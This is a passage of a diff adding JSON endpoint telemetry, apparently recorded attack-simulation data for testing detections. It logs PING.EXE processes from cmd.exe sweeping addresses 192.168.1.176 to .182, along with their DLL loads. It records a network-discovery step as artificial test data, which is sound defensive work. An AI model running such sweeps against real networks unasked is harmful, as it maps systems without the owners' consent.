"image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 5244, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572842140000, + "unique_pid": "{42FC7E13-CBA4-5C05-0000-001063405301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 5244, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572842140000, + "unique_pid": "{42FC7E13-CBA4-5C05-0000-001063405301}" + }, + { + "event_type": "process", + "pid": 5244, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572846990000, + "unique_pid": "{42FC7E13-CBA4-5C05-0000-001063405301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.176", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6488, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572847140000, + "unique_pid": "{42FC7E13-CBA4-5C05-0000-0010E5425301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 6488, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572847140000, + "unique_pid": "{42FC7E13-CBA4-5C05-0000-0010E5425301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6488, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572847140000, + "unique_pid": "{42FC7E13-CBA4-5C05-0000-0010E5425301}" 
+ }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6488, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572847140000, + "unique_pid": "{42FC7E13-CBA4-5C05-0000-0010E5425301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6488, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572847140000, + "unique_pid": "{42FC7E13-CBA4-5C05-0000-0010E5425301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6488, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572847140000, + "unique_pid": "{42FC7E13-CBA4-5C05-0000-0010E5425301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 6488, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572847140000, + "unique_pid": "{42FC7E13-CBA4-5C05-0000-0010E5425301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6488, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572847140000, + "unique_pid": "{42FC7E13-CBA4-5C05-0000-0010E5425301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 6488, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572847140000, + "unique_pid": "{42FC7E13-CBA4-5C05-0000-0010E5425301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": 
"C:\\Windows\\System32\\winnsi.dll", + "pid": 6488, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572847140000, + "unique_pid": "{42FC7E13-CBA4-5C05-0000-0010E5425301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 6488, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572847140000, + "unique_pid": "{42FC7E13-CBA4-5C05-0000-0010E5425301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 6488, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572847140000, + "unique_pid": "{42FC7E13-CBA4-5C05-0000-0010E5425301}" + }, + { + "event_type": "process", + "pid": 6488, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572851830000, + "unique_pid": "{42FC7E13-CBA4-5C05-0000-0010E5425301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.177", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5428, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572851980000, + "unique_pid": "{42FC7E13-CBA5-5C05-0000-001055455301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 5428, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572851980000, + "unique_pid": "{42FC7E13-CBA5-5C05-0000-001055455301}" + }, + { + 
"event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5428, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572851980000, + "unique_pid": "{42FC7E13-CBA5-5C05-0000-001055455301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5428, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572851980000, + "unique_pid": "{42FC7E13-CBA5-5C05-0000-001055455301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5428, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572851980000, + "unique_pid": "{42FC7E13-CBA5-5C05-0000-001055455301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5428, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572851980000, + "unique_pid": "{42FC7E13-CBA5-5C05-0000-001055455301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 5428, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572851980000, + "unique_pid": "{42FC7E13-CBA5-5C05-0000-001055455301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 5428, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572851980000, + "unique_pid": "{42FC7E13-CBA5-5C05-0000-001055455301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + 
"pid": 5428, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572851980000, + "unique_pid": "{42FC7E13-CBA5-5C05-0000-001055455301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 5428, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572851980000, + "unique_pid": "{42FC7E13-CBA5-5C05-0000-001055455301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 5428, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572851980000, + "unique_pid": "{42FC7E13-CBA5-5C05-0000-001055455301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 5428, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572851980000, + "unique_pid": "{42FC7E13-CBA5-5C05-0000-001055455301}" + }, + { + "event_type": "process", + "pid": 5428, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572856990000, + "unique_pid": "{42FC7E13-CBA5-5C05-0000-001055455301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.178", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 1916, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572857130000, + "unique_pid": "{42FC7E13-CBA5-5C05-0000-0010D2475301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + 
"image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 1916, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572857140000, + "unique_pid": "{42FC7E13-CBA5-5C05-0000-0010D2475301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 1916, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572857140000, + "unique_pid": "{42FC7E13-CBA5-5C05-0000-0010D2475301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 1916, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572857140000, + "unique_pid": "{42FC7E13-CBA5-5C05-0000-0010D2475301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 1916, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572857140000, + "unique_pid": "{42FC7E13-CBA5-5C05-0000-0010D2475301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 1916, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572857140000, + "unique_pid": "{42FC7E13-CBA5-5C05-0000-0010D2475301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 1916, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572857140000, + "unique_pid": "{42FC7E13-CBA5-5C05-0000-0010D2475301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 1916, + "process_name": 
"PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572857140000, + "unique_pid": "{42FC7E13-CBA5-5C05-0000-0010D2475301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 1916, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572857140000, + "unique_pid": "{42FC7E13-CBA5-5C05-0000-0010D2475301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 1916, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572857300000, + "unique_pid": "{42FC7E13-CBA5-5C05-0000-0010D2475301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 1916, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572857300000, + "unique_pid": "{42FC7E13-CBA5-5C05-0000-0010D2475301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 1916, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572857300000, + "unique_pid": "{42FC7E13-CBA5-5C05-0000-0010D2475301}" + }, + { + "event_type": "process", + "pid": 1916, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572861830000, + "unique_pid": "{42FC7E13-CBA5-5C05-0000-0010D2475301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.179", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 1544, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", 
+ "timestamp": 131883572861980000, + "unique_pid": "{42FC7E13-CBA6-5C05-0000-0010294C5301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 1544, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572861980000, + "unique_pid": "{42FC7E13-CBA6-5C05-0000-0010294C5301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 1544, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572861980000, + "unique_pid": "{42FC7E13-CBA6-5C05-0000-0010294C5301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 1544, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572861980000, + "unique_pid": "{42FC7E13-CBA6-5C05-0000-0010294C5301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 1544, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572861980000, + "unique_pid": "{42FC7E13-CBA6-5C05-0000-0010294C5301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 1544, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572861980000, + "unique_pid": "{42FC7E13-CBA6-5C05-0000-0010294C5301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 1544, + "process_name": "PING.EXE", + "process_path": 
"C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572861980000, + "unique_pid": "{42FC7E13-CBA6-5C05-0000-0010294C5301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 1544, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572861980000, + "unique_pid": "{42FC7E13-CBA6-5C05-0000-0010294C5301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 1544, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572861980000, + "unique_pid": "{42FC7E13-CBA6-5C05-0000-0010294C5301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 1544, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572861980000, + "unique_pid": "{42FC7E13-CBA6-5C05-0000-0010294C5301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 1544, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572861980000, + "unique_pid": "{42FC7E13-CBA6-5C05-0000-0010294C5301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 1544, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572861980000, + "unique_pid": "{42FC7E13-CBA6-5C05-0000-0010294C5301}" + }, + { + "event_type": "process", + "pid": 1544, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572866990000, + "unique_pid": "{42FC7E13-CBA6-5C05-0000-0010294C5301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.180", 
+ "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 2784, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572867130000, + "unique_pid": "{42FC7E13-CBA6-5C05-0000-0010A54E5301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 2784, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572867140000, + "unique_pid": "{42FC7E13-CBA6-5C05-0000-0010A54E5301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 2784, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572867140000, + "unique_pid": "{42FC7E13-CBA6-5C05-0000-0010A54E5301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 2784, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572867140000, + "unique_pid": "{42FC7E13-CBA6-5C05-0000-0010A54E5301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 2784, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572867140000, + "unique_pid": "{42FC7E13-CBA6-5C05-0000-0010A54E5301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 2784, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + 
"timestamp": 131883572867140000, + "unique_pid": "{42FC7E13-CBA6-5C05-0000-0010A54E5301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 2784, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572867140000, + "unique_pid": "{42FC7E13-CBA6-5C05-0000-0010A54E5301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 2784, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572867140000, + "unique_pid": "{42FC7E13-CBA6-5C05-0000-0010A54E5301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 2784, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572867140000, + "unique_pid": "{42FC7E13-CBA6-5C05-0000-0010A54E5301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 2784, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572867140000, + "unique_pid": "{42FC7E13-CBA6-5C05-0000-0010A54E5301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 2784, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572867140000, + "unique_pid": "{42FC7E13-CBA6-5C05-0000-0010A54E5301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 2784, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572867300000, + "unique_pid": "{42FC7E13-CBA6-5C05-0000-0010A54E5301}" + }, + { + "event_type": "process", + 
"pid": 2784, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572871830000, + "unique_pid": "{42FC7E13-CBA6-5C05-0000-0010A54E5301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.181", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 2228, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572871980000, + "unique_pid": "{42FC7E13-CBA7-5C05-0000-001019515301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 2228, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572871990000, + "unique_pid": "{42FC7E13-CBA7-5C05-0000-001019515301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 2228, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572871990000, + "unique_pid": "{42FC7E13-CBA7-5C05-0000-001019515301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 2228, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572871990000, + "unique_pid": "{42FC7E13-CBA7-5C05-0000-001019515301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 2228, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572871990000, + 
"unique_pid": "{42FC7E13-CBA7-5C05-0000-001019515301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 2228, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572871990000, + "unique_pid": "{42FC7E13-CBA7-5C05-0000-001019515301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 2228, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572871990000, + "unique_pid": "{42FC7E13-CBA7-5C05-0000-001019515301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 2228, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572871990000, + "unique_pid": "{42FC7E13-CBA7-5C05-0000-001019515301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 2228, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572871990000, + "unique_pid": "{42FC7E13-CBA7-5C05-0000-001019515301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 2228, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572871990000, + "unique_pid": "{42FC7E13-CBA7-5C05-0000-001019515301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 2228, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572871990000, + "unique_pid": "{42FC7E13-CBA7-5C05-0000-001019515301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + 
"image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 2228, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572871990000, + "unique_pid": "{42FC7E13-CBA7-5C05-0000-001019515301}" + }, + { + "event_type": "process", + "pid": 2228, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572876840000, + "unique_pid": "{42FC7E13-CBA7-5C05-0000-001019515301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.182", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5736, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572876980000, + "unique_pid": "{42FC7E13-CBA7-5C05-0000-001096535301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 5736, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572876980000, + "unique_pid": "{42FC7E13-CBA7-5C05-0000-001096535301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5736, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572876980000, + "unique_pid": "{42FC7E13-CBA7-5C05-0000-001096535301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5736, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572876980000, + "unique_pid": 
"{42FC7E13-CBA7-5C05-0000-001096535301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5736, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572876980000, + "unique_pid": "{42FC7E13-CBA7-5C05-0000-001096535301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5736, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572876980000, + "unique_pid": "{42FC7E13-CBA7-5C05-0000-001096535301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 5736, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572876980000, + "unique_pid": "{42FC7E13-CBA7-5C05-0000-001096535301}" + }, + { + "event_type": "image_load", + "image_name": 